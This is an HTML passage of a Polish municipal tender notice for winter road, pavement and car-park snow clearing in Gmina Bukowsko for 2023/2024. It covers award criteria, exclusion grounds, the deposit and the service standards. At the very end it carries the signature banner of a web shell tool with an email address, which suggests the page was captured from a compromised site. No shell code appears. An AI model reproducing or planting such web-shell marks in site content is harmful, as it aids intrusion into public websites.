ewid. 144 – 225m <br/>5.	Do p. Marca - dz. nr ewid. 228 – 280m<br/>6.	Do p. Drozd - dz. nr ewid. 37 – 130m<br/><br/>SUMA: drogi – 4910m<br/><br/><br/>PODSUMOWANIE:<br/>Drogi: 61315m	<br/>Chodniki: 5640 m<br/>Parkingi, place: 9415 m2 </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">90620000-9 - Usługi odśnieżania</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">6 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">2.	Zaoferowana cena przedstawiona w ofercie obejmuje sumę zadań I, II i III w danym obrębie:<br/>I.	Koszt odśnieżanie dróg = ilość km x stawka w zł brutto/km<br/>II.	Koszt odśnieżania chodników = ilość km x stawka w zł brutto/km<br/>III.	Koszt odśnieżania parkingów/placów = ilość m2 x stawka w zł brutto/m2</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60,00</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Termin płatności</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40,00</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <p class="mb-0">Art. 109 ust. 1 pkt 5</p> <p class="mb-0">Art. 109 ust. 1 pkt 6</p> <p class="mb-0">Art. 109 ust. 1 pkt 7</p> <p class="mb-0">Art. 109 ust. 1 pkt 9</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> 1.	O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy nie podlegają wykluczeniu, na zasadach określonych w niniejszej SWZ, oraz spełniają określone przez Zamawiającego warunki udziału w postępowaniu. <br/>2.	O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy spełniają warunki dotyczące: <br/>1)	zdolności do występowania w obrocie gospodarczym: <br/>Zamawiający nie stawia warunku w powyższym zakresie. <br/>2)	uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej, o ile wynika to z odrębnych przepisów: Zamawiający nie stawia warunku w powyższym zakresie. <br/>3) sytuacji ekonomicznej lub finansowej: <br/>Zamawiający nie stawia warunku w powyższym zakresie. <br/>	4) zdolności technicznej lub zawodowej: <br/>•	potencjał techniczny: Zamawiający dokona oceny spełnienia warunków udziału w postępowaniu w tym zakresie na podstawie złożonego przez Wykonawcę wraz z ofertą oświadczenia o spełnianiu warunków udziału w postępowaniu. Wykaz niezbędnego sprzętu do wykonania zamówienia jakim dysponuje Wykonawca stanowi załącznik nr 5 do SWZ.<br/>W przypadku wyboru oferty zamawiający dokona sprawdzenia sprzętu w oparciu o złożone zestawienie przez oferenta po otwarciu ofert w miejscu wskazanym przez oferenta.<br/>•	potencjał kadrowy: Zamawiający nie stawia warunku w powyższym zakresie. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">b)	Wykaz narzędzi, wyposażenia zakładu lub urządzeń technicznych udostępnionych wykonawcy w celu wykonania zamówienia publicznego oraz informacją o podstawie do dysponowania tymi zasobami. Dokument potwierdzający udostępnienie sprzętu niezbędnego do wykonania zamówienia wykazanego zgodnie z załącznikiem nr 5 do SWZ<br/>c)	Polisa ubezpieczeniowa OC na usługi pn.: „Usługi związane z zimowym utrzymaniem dróg gminnych, wewnętrznych dojazdowych oraz chodników na terenie Gminy Bukowsko w sezonie zimowym 2023/2024” z sumą ubezpieczenia nie niższą niż 200 000,00 zł (słownie: dwieście tysięcy złotych, 00/100 groszy), uwzględniająca szkody oraz następstwa nie wykonanej lub źle wykonanej usługi</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">a)	oświadczenia Wykonawcy, w zakresie art. 108 ust. 1 pkt 5 ustawy, o braku przynależności do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007r. o ochronie konkurencji i konsumentów (Dz. U. z 2020 r. poz. 1076 i 1086), z innym Wykonawcą, który złożył odrębną ofertę, ofertę częściową lub wniosek o dopuszczenie do udziału w postępowaniu, albo oświadczenia o przynależności do tej samej grupy kapitałowej wraz z dokumentami lub informacjami potwierdzającymi przygotowanie oferty, oferty częściowej lub wniosku o dopuszczenie do udziału w postępowaniu niezależnie od innego Wykonawcy należącego do tej samej grupy kapitałowej. Oświadczenie stanowi załącznik nr 6 do SWZ.<br/> W przypadku wspólnego ubiegania się o zamówienie przez Wykonawców, oświadczenie składa każdy z Wykonawców wspólnie ubiegających się o zamówienie.</span> </h3> <h3 class="mb-0">5.8.) Wykaz przedmiotowych środków dowodowych: </h3> Nie dotyczy <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.4.1) Informacje dotyczące wadium: </h3> 1.	Wykonawca zobowiązany jest do zabezpieczenia swojej oferty wadium w wysokości: <br/>500,00 zł (słownie: pięćset złotych, 00/100 groszy) do każdego zadania; <br/>2.	Wadium wnosi się przed upływem terminu składania ofert i utrzymuje nieprzerwanie do dnia upływu terminu związania ofertą, z wyjątkiem przypadków, o których mowa w art. 98 ust. 1 pkt 2 i 3 oraz ust. 2. <br/>3.	Wadium może być wnoszone według wyboru Wykonawcy w jednej lub kilku następujących formach: <br/>1)	pieniądzu; <br/>2)	gwarancjach bankowych; <br/>3)	gwarancjach ubezpieczeniowych; <br/>4)	poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości. <br/>4.	Wadium w formie pieniądza należy wnieść przelewem na konto Zamawiającego:<br/>Krakowski Bank Spółdzielczy<br/>Nr rachunku: 39 8591 0007 0400 0899 7412 0003<br/>z dopiskiem:<br/>wadium na „Usługi związane z zimowym utrzymaniem dróg gminnych, wewnętrznych dojazdowych oraz chodników na terenie gminy Bukowsko w sezonie zimowym 2023/2024” <br/>UWAGA: <br/>Za termin wniesienia wadium w formie pieniężnej zostanie przyjęty termin uznania rachunku Zamawiającego. <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 1.	Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia. W takim przypadku Wykonawcy ustanawiają pełnomocnika do reprezentowania ich w postępowaniu albo do reprezentowania i zawarcia umowy w sprawie zamówienia publicznego – nie dotyczy spółki cywilnej, o ile upoważnienie/pełnomocnictwo do występowania w imieniu tej spółki wynika z dołączonej do oferty umowy spółki bądź wszyscy wspólnicy podpiszą ofertę. <br/>2.	Wykonawcy wspólnie ubiegający się o udzielenie zamówienia, zobowiązani się złożyć wraz z ofertą stosowne pełnomocnictwo – nie dotyczy spółki cywilnej, o ile upoważnienie/pełnomocnictwo do występowania w imieniu tej spółki wynika z dołączonej do oferty umowy spółki bądź wszyscy wspólnicy podpiszą ofertę. Uwaga Pełnomocnictwo, o którym mowa powyżej może wynikać albo z dokumentu pod taką samą nazwą, albo <br/>z umowy Wykonawców wspólnie ubiegających się o udzielenie zamówienia. <br/>3.	Oferta musi być podpisana w taki sposób, by prawnie zobowiązywała wszystkich Wykonawców występujących wspólnie (przez każdego z Wykonawców lub upoważnionego pełnomocnika). <br/>4.	Wszelka korespondencja prowadzona będzie wyłącznie z pełnomocnikiem <br/>5.	W przypadku wspólnego ubiegania się o udzielenie zamówienie przez Wykonawców oświadczenie, o którym mowa w art. 125 ustawy składa każdy z Wykonawców wspólnie ubiegających się o zamówienie. Oświadczenia te potwierdzają spełnianie warunków udziału w postępowaniu w zakresie, w którym Wykonawca wspólnie ubiegający się o udzielenie zamówienia wykazuje spełnianie warunków udziału w postępowaniu, oraz brak podstaw wykluczenia - każdy z Wykonawców wspólnie ubiegających się o udzielenie zamówienia nie może podlegać wykluczeniu z postępowania w oparciu o wskazane w SWZ podstawy wykluczenia. Powyższe oznacza, iż: <br/>5.1. Oświadczenie w zakresie braku podstaw wykluczenia musi złożyć każdy <br/>z Wykonawców wspólnie ubiegających się o udzielenie zamówienia; <br/>5.2. Oświadczenie o spełnianiu warunków udziału składa podmiot, który w odniesieniu do danego warunku udziału w postępowaniu potwierdza jego spełnianie; dopuszcza się oświadczenie złożone łącznie, tj. podpisane przez wszystkie podmioty wspólnie składające ofertę lub przez pełnomocnika występującego w imieniu wszystkich podmiotów. <br/>5.3. Wykonawcy wspólnie ubiegający się o udzielenie zamówienia dołączają do oferty oświadczenie, z którego wynika, które roboty budowlane/dostawy/usługi wykonają poszczególni wykonawcy – załącznik nr 4 do SWZ. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> 1.	Wybrany Wykonawca jest zobowiązany do zawarcia umowy w sprawie zamówienia publicznego na warunkach określonych we Wzorze Umowy, stanowiącym Załącznik nr 7 do SWZ. <br/>2.	Zakres świadczenia Wykonawcy wynikający z umowy jest tożsamy z jego zobowiązaniem zawartym w ofercie. <br/>3.	Zamawiający przewiduje możliwość zmiany zawartej umowy w stosunku do treści wybranej oferty w zakresie wskazanym we Wzorze Umowy. <br/>4.	Zmiana umowy wymaga dla swej ważności, pod rygorem nieważności, zachowania formy pisemnej. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2023-09-14 09:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">www.bukowsko.pl</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2023-09-14 09:30</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2023-10-13</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IX – POZOSTAŁE INFORMACJE</h2> 1.	Przedmiotem zamówienia jest zimowe utrzymanie dróg gminnych, wewnętrznych dojazdowych oraz chodników na terenie gminy Bukowsko w sezonie zimowym 2023/2024 wg. poniższego zestawienia dróg w obrębach. Szacowana długość wszystkich dróg i chodników oraz powierzchni placów/parkingów w sołectwach wynosi około 60 km dróg o różnych parametrach, około 5,5 km chodników i około 9,5 tys. m2 parkingów/placów. Na odcinkach szczególnie wąskich pomiędzy posesjami zachodzi konieczność wywozu śniegu na miejsce wskazane przez zamawiającego.Wykonawca jest odpowiedzialny za jakość, zgodną z niniejszymi warunkami wykonania dla przedmiotu zamówienia: <br/>1.	jezdnia odśnieżana na całej szerokości, <br/>2.	jezdnia posypana na: <br/>- skrzyżowaniach z drogami<br/>- odcinkach o pochyleniu &gt; 4% <br/>- w innych w miejscach wskazanych przez sołtysa danej wsi<br/>3.	w przypadku oblodzenia, gołoledzi jezdnia posypywana na całej długości i szerokości<br/>4.	chodniki odśnieżane i posypywane na całej szerokości,<br/>5.	parkingi k/Kościoła odśnieżane wyłącznie w niedziele i święta lub na polecenie sołtysa wsi,<br/>6.	nie dopuszcza się zalegania śniegu, błota pośniegowego w warstwie powyżej 10 cm, <br/>7.	Wykonawca zapewnia przejezdność wyznaczonych dróg, chodników, parkingów, placów:<br/>- od poniedziałku do soboty w godzinach od 5:00 do 6:30,<br/>- w niedziele i święta w godzinach od 6:00 do 7:30,<br/>- parkingi k/Szkół, Przedszkoli od poniedziałku do piątku do godziny 6:30,<br/>8.	Wykonawca ma obowiązek każdorazowo po wykonaniu odśnieżania w godzinach porannych, poinformować o jego wykonaniu sołtysa wsi, w celu możliwości dokonania weryfikacji rzetelności wykonania usługi,<br/>9.	o dodatkowych przejazdach w trakcie danego dnia decyduje wyłącznie sołtys wsi lub pracownik urzędu,<br/>10.	Wykonawca jest zobowiązany zapewnić całodobową dyspozycyjność pod nr telefonu wskazanym w ofercie,<br/>11.	w cenie usługi wykonawca zobowiązany jest do wywiezienia zalegającego śniegu na wąskich odcinkach wyznaczonych dróg zimowego utrzymania,<br/>12.	Wykonawca dostarczy piasek do posypywania skrzyżowań, wzniesień na miejsce wskazane przez sołtysa wsi lub pracownika urzędu w specjalnie przeznaczonych do tego kubłach,<br/>13.	Obowiązuje rozliczenie miesięczne poprzez wystawienie rachunku/faktury na podstawie miesięcznych kart pracy zatwierdzonych przez sołtysa. Rachunek/fakturę wraz z miesięczną kartą pracy oraz raportem przejazdów pojazdów z systemu nawigacji satelitarnej GPS należy dostarczyć do Urzędu Gminy najpóźniej w terminie siedmiu dni od zakończenia miesiąca pracy (karty dostarczone po terminie nie będą rozliczane).<br/>14.	Wykonawca zobowiązany jest do ubezpieczenia w zakresie odpowiedzialności cywilnej <br/>z tytułu szkód powstałych w związku z realizacją zamówienia (we własnym imieniu i na własny koszt) na sumę ubezpieczenia nie niższą niż 200.000,00 zł (słownie: dwieście tysięcy złotych, 00/100groszy). Ochroną ubezpieczenia musi być objęta OC za szkody oraz następstwa wypadków powstałe w związku z wykonywaniem umowy. Polisa OC musi zostać dostarczona na wezwanie Zamawiającego.<br/>15.	Wykonawca zobowiązany jest do posprzątania jezdni z nadmiaru środków użytych do posypywania - w okresach roztopów oraz po zakończonym sezonie zimowym,

Creat By MiNi SheLL
Email: jattceo@gmail.com